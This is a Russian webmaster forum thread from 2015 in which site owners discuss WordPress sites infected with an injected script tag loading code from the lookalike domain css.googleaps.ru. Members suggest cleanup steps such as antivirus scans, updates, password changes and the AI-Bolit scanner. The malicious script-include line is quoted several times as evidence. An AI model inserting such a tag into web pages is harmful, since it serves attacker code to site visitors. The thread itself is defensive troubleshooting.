- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы
Для интернет-магазина инженерных систем
Мария Лосева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Всем. Это НЕ решение данной проблемы.
А вот с этим согласен.
Никто не говорил, что это 100% надежное решение.
Можно обновить и проверить весь сайт (а это деньга), а можно просто обновить и обновлением закрыть дыру.
Ну и конечно почистить бд.
Только никто не гарантирует, что дыра закроется обновлением.
Тут как повезет.
avantus избрал путь обновления.
Возможно, все будет хорошо, что я ему желаю.
Сегодня опять появилась эта же лабуда... я один такой? как боролись?
<script src="//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2"></script>
Вот такой код появился на страницах сайта. Я конечно могу удалить плагином Search Regex, но до этого уже так делал с другим похожим скриптом, а теперь вот снова другая, но подобная фигня появилась. Есть у кого мысли по решению?
<script src="//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2"></script>
Вот такой код появился на страницах сайта. Я конечно могу удалить плагином Search Regex, но до этого уже так делал с другим похожим скриптом, а теперь вот снова другая, но подобная фигня появилась. Есть у кого мысли по решению?
Это пробовали:
0. Проверить сайт антивирусами (обычно на хостинге стоит ClamAV, но можно скачать сайт к себе и прогнать всеми доступными антивирусами).
1. Проверить свой ПК на наличие зловредов антивирусом со свежими вирусными базами. Куда лучше будет проверить ПК несколькими антивирусами с livecd, т. е. не из запущенной системы. Такие livecd утилиты обычно доступны для скачивания с сайтов антивирусных компаний. Пример такой утилиты http://www.freedrweb.com/livecd/?lng=ru
2. Обновить все скрипты, плагины, темы и CMS на всех сайтах до последних актуальных версий. При необходимости, переустановить CMS, если есть сомнения в корректности данных. Все файлы скачивать только с официальных ресурсов (т.е. того же wordpress или других доверенных, а не с файлопомоек).
3. Сменить все пароли для доступа в админ-панели сайтов, в почтовые ящики, FTP аккаунты, SSH, доступ к базам данных и т. п.
?
Если не поможет, значит, надо руками искать, как это попадает на сайт....
Погуглил чуток - у многих такая проблема с вордпрессом проявилась (сторонние скрипты аптолайкед, css.googleaps.ru.....). Способа - делаем то-то и все ок пока не увидел.
Возможно - дыра в самом вордпрессе из коробки и простое тотальное обновление всего и вся не поможет.....
Если так - то перекапывать весь вордпресс надо, а это прилично человекочасов...
Это пробовали:
?
Если не поможет, значит, надо руками искать, как это попадает на сайт....
Погуглил чуток - у многих такая проблема с вордпрессом проявилась (сторонние скрипты аптолайкед, css.googleaps.ru.....). Способа - делаем то-то и все ок пока не увидел.
Возможно - дыра в самом вордпрессе из коробки и простое тотальное обновление всего и вся не поможет.....
Если так - то перекапывать весь вордпресс надо, а это прилично человекочасов...
Пока что просто удалял скрипт. Комп вряд ли заражен, так как не в винде работаю. Пароли менял. Хотя вот недавно доступ к базе давал фрилансеру, но всё равно он не справился с работой и я прежний дамп опять установил. К тому же и на других сайтах сайтах подобная проблема появлялась, только скрипты другие появлялись.
Нужно какое-то готовое более менее универсальное решение. Для начала понять бы, что за фигня это, что она делает и кому это выгодно.
Если в движке/плагинах есть дыра - то это заливают боты.
Посканьте айболитом бд и скрипты - вдруг что найдется.
У одного вебмастера была похожая проблема -оказался вредоносный скриптик лежал на сайте в укромном месте.
Только в айболите ставьте макс. чувствительность и задайте в пхп-ини размер памяти под пхп побольше -чтобы дамп айболит смог проверить.
Лучше сканить на локальном компе -там все равно обычно на нагрузку.
Хотите бесплатное решение - гуглите.
За глаза никто ничего не скажет на 100%..
Проверил ещё несколько сайтов - тоже заражены. Может у хостера уязвимость какая?
Alexbu, версия вп какая?
Alexbu, версия вп какая?
версия последняя, после августовской напасти я думаю все обновляются вовремя, но только это оказалось не панацея...
---------- Добавлено 16.10.2015 в 22:20 ----------
Проверил ещё несколько сайтов - тоже заражены. Может у хостера уязвимость какая?
была такая мысль... у меня ihc.ru хостер
Слышал про ихц, что у них часто были проблемы с безопасностью, не знаю, как сейчас....
Дыра также может быть в каком-либо стороннем плагине.